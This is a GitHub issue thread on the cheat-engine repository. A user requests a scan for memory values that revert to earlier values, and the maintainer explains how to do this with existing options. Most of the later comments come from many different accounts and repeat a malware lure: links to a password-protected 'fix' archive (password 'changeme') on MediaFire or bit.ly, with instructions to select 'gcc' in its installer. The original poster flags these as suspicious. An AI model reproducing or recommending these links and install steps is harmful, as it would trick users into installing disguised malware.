### ISSUE TITLE
Feature Request: Add Support for Searching Values Changed to Previous Values (and First values separately)

### ISSUE THREAD

**Issue by dewxo** [cheat-engine/cheat-engine#2988]
It would be really helpful to add a feature that lets users search for memory addresses where the current value has changed back to what it was before. 

For example, in a game, if an item slot was set to ID yy, changed to ID xx, and then reverted to ID yy, being able to find this easily would be a great time-saver. 

We will be using the previous column of the scanned addresses pane, we already have that previous table just need to implement a scan option for it.

I don't have any experience of writing ce plugins and starting from scratch will take me enough time to give up i guess.🫡

**Comment by dewxo** [comment]
https://forum.cheatengine.org/viewtopic.php?t=587932

This Lua Extension might help to create a plugin.

**Comment by cheat-engine** [comment]
Do an unknown initial value scan

change the value and scan for changed

now when the value has returned to the original value select 'compare to first scan' and then scan for 'unchanged value'

**Comment by dewxo** [comment]
> now when the value has returned to the original value select 'compare to first scan' and then scan for 'unchanged value'

Yes this is better than my version, I do between 100% and 100% percentage scan with first

**Comment by Lxx-c** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Lxx-c** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by dewxo** [comment]
I'm not doing that @April, you are suspicious, why would someone password a zip.

**Comment by Searchanik** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by dewxo** [comment]
I'm not doing that @April, you are suspicious, why would someone password a zip.
@Searchanik 
Same guy?

**Comment by Superming997** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Avishake2017** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Bongton** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by YeGop0218** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by Gaurav9812** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by chenshupe** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
